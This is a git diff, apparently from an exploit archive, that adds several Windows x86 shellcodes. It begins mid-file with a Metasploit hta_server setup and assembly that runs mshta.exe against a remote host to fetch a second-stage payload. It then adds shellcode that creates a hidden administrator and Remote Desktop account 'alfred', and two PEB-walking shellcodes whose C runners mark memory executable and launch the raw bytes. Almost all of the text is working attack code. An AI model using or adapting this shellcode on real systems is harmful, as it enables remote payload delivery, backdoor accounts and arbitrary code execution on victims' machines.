+# windows/patchupmeterpreter/reverse_tcp_allports
+
+
+# "hta_server" exploit payloads setting example:
+
+# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
+# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
+# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
+# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
+# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
+
+
+# Shellcode considerations:
+
+# Function address of CreateProcessA in kernel32.dll: 0x75732082
+# Function address of ExitProcess in kernel32.dll: 0x7578214f
+# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
+# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
+
+
+# Assembly Shellcode:
+
+
+
+global _start
+
+section .text
+
+_start:
+ jmp application
+
+firststep:
+ pop edi
+ xor eax, eax
+ mov [edi+65], al ; size in bytes of message db parameter
+
+StartUpInfoANDProcessInformation:
+
+ push eax ; hStderror null in this case
+ push eax ; hStdOutput, null
+ push eax ; hStdInput, null
+ xor ebx, ebx
+ xor ecx, ecx
+ add cl, 0x12 ; 18 times loop to fill both structures.
+
+looper:
+ push ebx
+ loop looper
+
+ ;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
+ mov bx, 0x1111
+ sub bx, 0x1010
+ mov word [esp+0x3c], bx
+ mov byte [esp+0x10], 0x44 ; cb=0x44
+ lea eax, [esp+0x10] ; eax points to StartUpInfo
+
+ ; eax has a pointer to StartUPinfo
+ ; esp has a pointer to Process_Info containing null values
+createprocessA:
+ push esp ; pointer to Process-Info
+ push eax ; pointer to StartUpInfo
+ xor ebx, ebx
+ push ebx ; null
+ push ebx ; null
+ push ebx ; null
+ inc ebx
+ push ebx ; bInheritHandles=true
+ dec ebx
+ push ebx ; null
+ push ebx ; null
+ push edi ; pointer to message db string
+ push ebx ; null
+ mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
+ call edx
+
+ExitProcess:
+ push eax ; createprocessA return in eax
+ mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
+ call edx
+
+application:
+ call firststep
+ message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"
\ No newline at end of file
diff --git a/shellcodes/windows_x86/49592.asm b/shellcodes/windows_x86/49592.asm
new file mode 100644
index 000000000..b3ad279df
--- /dev/null
+++ b/shellcodes/windows_x86/49592.asm
@@ -0,0 +1,84 @@
+# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
+# Exploit Author: Armando Huesca Prida
+# Date: 20-02-2021
+#
+# Tested on:
+# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
+# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
+# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
+#
+# Description:
+# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
+# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
+#
+# Shellcode considerations:
+# Function address of CreateProcessA in kernel32.dll: 0x77082082
+# Function address of ExitProcess in kernel32.dll: 0x770d214f
+# Administartor user credentials: alfred:test
+# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
+#
+
+
+# Assembly shellcode:
+
+global _start
+
+section .text
+
+_start:
+jmp application
+
+firststep:
+pop edi
+xor eax, eax
+mov esi, 0x111111A9
+sub esi, 0x11111111
+mov [edi+esi], al ; size of message db parameter
+
+StartUpInfoANDProcessInformation:
+push eax; hStderror null in this case
+push eax; hStdOutput, null
+push eax; hStdInput, null
+xor ebx, ebx
+xor ecx, ecx
+add cl, 0x12; 18 times loop to fill both structures.
+
+looper:
+push ebx
+loop looper
+
+;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
+mov bx, 0x1111
+sub bx, 0x1010
+mov word [esp+0x3c], bx
+mov byte [esp+0x10], 0x44; cb=3D0x44
+lea eax, [esp+0x10]; eax points to StartUpInfo
+
+; eax holds a pointer to StartUPinfo
+; esp holds a pointer to Process_Info filled of null values
+
+createprocessA:
+push esp; pointer to Process-Info
+push eax; pointer to StartUpInfo
+xor ebx, ebx
+push ebx; null
+push ebx; null
+push ebx; null
+inc ebx
+push ebx; bInheritHandles=3Dtrue
+dec ebx
+push ebx; null
+push ebx; null
+push edi; pointer to message db string
+push ebx; null
+mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
+call edx
+
+ExitProcess:
+push eax; createprocessA return in eax
+mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
+call edx
+
+application:
+call firststep
+message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'
\ No newline at end of file
diff --git a/shellcodes/windows_x86/50368.c b/shellcodes/windows_x86/50368.c
new file mode 100644
index 000000000..d42d3c2ec
--- /dev/null
+++ b/shellcodes/windows_x86/50368.c
@@ -0,0 +1,187 @@
+; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
+
+; Description:
+
+; This is a shellcode that pop a calc.exe. The shellcode iuses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table
+; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
+; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
+; and exits gracefully using TerminateProcess.
+
+; Author: h4pp1n3ss
+; Date: Wed 09/22/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+start:
+
+ mov ebp, esp ; prologue
+ add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering
+
+
+ find_kernel32:
+ xor ecx, ecx ; ECX = 0
+ mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
+ mov esi,[esi+0x0C] ; ESI = PEB->Ldr
+ mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
+
+ next_module:
+ mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
+ mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
+ mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
+ cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
+ jne next_module ; No: try next module
+
+ find_function_shorten:
+ jmp find_function_shorten_bnc ; Short jump
+
+ find_function_ret:
+ pop esi ; POP the return address from the stack
+ mov [ebp+0x04], esi ; Save find_function address for later usage
+ jmp resolve_symbols_kernel32 ;
+
+ find_function_shorten_bnc:
+ call find_function_ret ; Relative CALL with negative offset
+
+ find_function:
+ pushad ; Save all registers
+
+ mov eax, [ebx+0x3c] ; Offset to PE Signature
+ mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
+ add edi, ebx ; Export Table Directory VMA
+ mov ecx, [edi+0x18] ; NumberOfNames
+ mov eax, [edi+0x20] ; AddressOfNames RVA
+ add eax, ebx ; AddressOfNames VMA
+ mov [ebp-4], eax ; Save AddressOfNames VMA for later
+
+ find_function_loop:
+ jecxz find_function_finished ; Jump to the end if ECX is 0
+ dec ecx ; Decrement our names counter
+ mov eax, [ebp-4] ; Restore AddressOfNames VMA
+ mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
+ add esi, ebx ; Set ESI to the VMA of the current symbol name
+
+ compute_hash:
+ xor eax, eax ; NULL EAX
+ cdq ; NULL EDX
+ cld ; Clear direction
+
+ compute_hash_again:
+ lodsb ; Load the next byte from esi into al
+ test al, al ; Check for NULL terminator
+ jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
+ ror edx, 0x0d ; Rotate edx 13 bits to the right
+ add edx, eax ; Add the new byte to the accumulator
+ jmp compute_hash_again ; Next iteration
+
+ compute_hash_finished:
+
+ find_function_compare:
+ cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
+ jnz find_function_loop ; If it doesn't match go back to find_function_loop
+ mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
+ add edx, ebx ; AddressOfNameOrdinals VMA
+ mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
+ mov edx, [edi+0x1c] ; AddressOfFunctions RVA
+ add edx, ebx ; AddressOfFunctions VMA
+ mov eax, [edx+4*ecx] ; Get the function RVA
+ add eax, ebx ; Get the function VMA
+ mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
+
+ find_function_finished:
+ popad ; Restore registers
+ ret ;
+
+ resolve_symbols_kernel32:
+ push 0xe8afe98 ; WinExec hash
+ call dword ptr [ebp+0x04] ; Call find_function
+ mov [ebp+0x10], eax ; Save WinExec address for later usage
+ push 0x78b5b983 ; TerminateProcess hash
+ call dword ptr [ebp+0x04] ; Call find_function
+ mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
+
+ create_calc_string:
+ xor eax, eax ; EAX = null
+ push eax ; Push null-terminated string
+ push dword 0x6578652e ;
+ push dword 0x636c6163 ;
+ push esp ; ESP = &(lpCmdLine)
+ pop ebx ; EBX save pointer to string
+
+ ; UINT WinExec(
+ ; LPCSTR lpCmdLine, -> EBX
+ ; UINT uCmdShow -> EAX
+ ; );
+
+ call_winexec:
+ xor eax, eax ; EAX = null
+ push eax ; uCmdShow
+ push ebx ; lpCmdLine
+ call dword ptr [ebp+0x10] ; Call WinExec
+
+ ; BOOL TerminateProcess(
+ ; HANDLE hProcess, -> 0xffffffff
+ ; UINT uExitCode -> EAX
+ ; );
+
+ terminate_process:
+ xor eax, eax ; EAX = null
+ push eax ; uExitCode
+ push 0xffffffff ; hProcess
+ call dword ptr [ebp+0x14] ; Call TerminateProcess
+
+
+[!]===================================== POC ========================================= [!]
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include
+#include
+#include
+#include
+
+// Our WinExec PopCalc shellcode
+
+unsigned char payload[] =
+"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
+"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
+"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
+"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
+"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
+"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
+"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
+"\xff\x55\x14";
+
+
+unsigned int payload_len = 178;
+
+int main(void) {
+
+ void * exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ // Allocate a memory buffer for payload
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ // Copy payload to new buffer
+ RtlMoveMemory(exec_mem, payload, payload_len);
+
+ // Make new buffer as executable
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+ printf("\nHit me!\n");
+ printf("Shellcode Length: %d\n", strlen(payload));
+ getchar();
+
+ // If all good, run the payload
+ if ( rv != 0 ) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/50369.c b/shellcodes/windows_x86/50369.c
new file mode 100644
index 000000000..7bd01b694
--- /dev/null
+++ b/shellcodes/windows_x86/50369.c
@@ -0,0 +1,196 @@
+; Name: Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
+; Author: h4pp1n3ss
+; Date: Wed 09/23/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+; Description:
+; This is a shellcode that
+; pop a MessageBox and show the text "Pwn3d by h4pp1n3ss". In order to accomplish this task the shellcode uses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table
+; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
+; symbols without worry about the length.
+
+
+
+start:
+ mov ebp, esp ;
+ add esp, 0xfffff9f0 ; Avoid NULL bytes
+
+find_kernel32:
+ xor ecx, ecx ; ECX = 0
+ mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
+ mov esi,[esi+0x0C] ; ESI = PEB->Ldr
+ mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
+
+next_module:
+ mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
+ mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
+ mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
+ cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
+ jne next_module ; No: try next module
+
+find_function_shorten:
+ jmp find_function_shorten_bnc ; Short jump
+
+find_function_ret:
+ pop esi ; POP the return address from the stack
+ mov [ebp+0x04], esi ; Save find_function address for later usage
+ jmp resolve_symbols_kernel32 ;
+
+find_function_shorten_bnc:
+ call find_function_ret ; Relative CALL with negative offset
+
+find_function:
+ pushad ; Save all registers
+ mov eax, [ebx+0x3c] ; Offset to PE Signature
+ mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
+ add edi, ebx ; Export Table Directory VMA
+ mov ecx, [edi+0x18] ; NumberOfNames
+ mov eax, [edi+0x20] ; AddressOfNames RVA
+ add eax, ebx ; AddressOfNames VMA
+ mov [ebp-4], eax ; Save AddressOfNames VMA for later
+
+find_function_loop:
+ jecxz find_function_finished ; Jump to the end if ECX is 0
+ dec ecx ; Decrement our names counter
+ mov eax, [ebp-4] ; Restore AddressOfNames VMA
+ mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
+ add esi, ebx ; Set ESI to the VMA of the current symbol name
+
+compute_hash:
+ xor eax, eax ; NULL EAX
+ cdq ; NULL EDX
+ cld ; Clear direction
+
+compute_hash_again:
+ lodsb ; Load the next byte from esi into al
+ test al, al ; Check for NULL terminator
+ jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
+ ror edx, 0x0d ; Rotate edx 13 bits to the right
+ add edx, eax ; Add the new byte to the accumulator
+ jmp compute_hash_again ; Next iteration
+
+compute_hash_finished:
+
+find_function_compare:
+ cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
+ jnz find_function_loop ; If it doesn't match go back to find_function_loop
+ mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
+ add edx, ebx ; AddressOfNameOrdinals VMA
+ mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
+ mov edx, [edi+0x1c] ; AddressOfFunctions RVA
+ add edx, ebx ; AddressOfFunctions VMA
+ mov eax, [edx+4*ecx] ; Get the function RVA
+ add eax, ebx ; Get the function VMA
+ mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
+
+find_function_finished:
+ popad ; Restore registers
+ ret ;
+
+resolve_symbols_kernel32:
+ push 0xec0e4e8e ; LoadLibraryA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x10], eax ; Save LoadLibraryA address for later usage
+ push 0x78b5b983 ; TerminateProcess hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
+
+load_user32_lib:
+ xor eax, eax ; EAX = Null
+ mov ax, 0x6c6c;
+ push eax; ; Stack = "ll"
+ push dword 0x642e3233; ; Stack = "32.dll"
+ push dword 0x72657355; ; Stack = "User32.dll"
+ push esp ; Stack = &("User32.dll")
+ call dword [ebp+0x10] ; Call LoadLibraryA
+
+resolve_symbols_user32:
+ mov ebx, eax ; Move the base address of user32.dll to EBX
+ push 0xbc4da2a8 ; MessageBoxA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x18], eax ; Save MessageBoxA address for later usage
+
+call_MessageBoxA:
+ xor eax, eax ; EAX = NULL
+ mov ax, 0x7373 ; "ss"
+ push eax ; Stack = "ss"
+ push dword 0x336e3170 ; Stack = "p1n3ss"
+ push dword 0x70346820 ; Stack = " h4pp1n3ss"
+ push dword 0x79622064 ; Stack = "d by h4pp1n3ss"
+ push dword 0x336e7750 ; Stack = "Pwn3d by h4pp1n3ss"
+ push esp ; Stack = &("Pwn3d by h4pp1n3ss")
+ mov ebx, [esp] ; EBX = &(push_inst_greetings)
+ xor eax, eax ; EAX = NULL
+ push eax ; uType
+ push ebx ; lpCaption
+ push ebx ; lpText
+ push eax ; hWnd
+ call dword [ebp+0x18] ; Call MessageBoxA
+
+call_TerminateProcess:
+ xor eax, eax ; EAX = null
+ push eax ; uExitCode
+ push 0xffffffff ; hProcess
+ call dword [ebp+0x14] ; Call TerminateProcess
+
+
+[!]===================================== POC ========================================= [!]
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include
+#include
+#include
+#include
+
+// Our MessageBoxA shellcode
+unsigned char payload[] =
+"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
+"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
+"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
+"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
+"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
+"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
+"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
+"\x68\x8e\x4e\x0e\xec\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55"
+"\x04\x89\x45\x14\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x55"
+"\x73\x65\x72\x54\xff\x55\x10\x89\xc3\x68\xa8\xa2\x4d\xbc\xff\x55\x04\x89"
+"\x45\x18\x31\xc0\x66\xb8\x73\x73\x50\x68\x70\x31\x6e\x33\x68\x20\x68\x34"
+"\x70\x68\x64\x20\x62\x79\x68\x50\x77\x6e\x33\x54\x8b\x1c\x24\x31\xc0\x50"
+"\x53\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55\x14";
+
+
+unsigned int payload_len = 230;
+
+int main(void) {
+
+ void * exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ // Allocate a memory buffer for payload
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ // Copy payload to new buffer
+ RtlMoveMemory(exec_mem, payload, payload_len);
+
+ // Make new buffer as executable
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+ printf("\nHit me!\n");
+ printf("Shellcode Length: %d\n", strlen(payload));
+ getchar();
+
+ // If all good, run the payload
+ if ( rv != 0 ) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+ }
+
+ return 0;
+}
\ No newline at end of file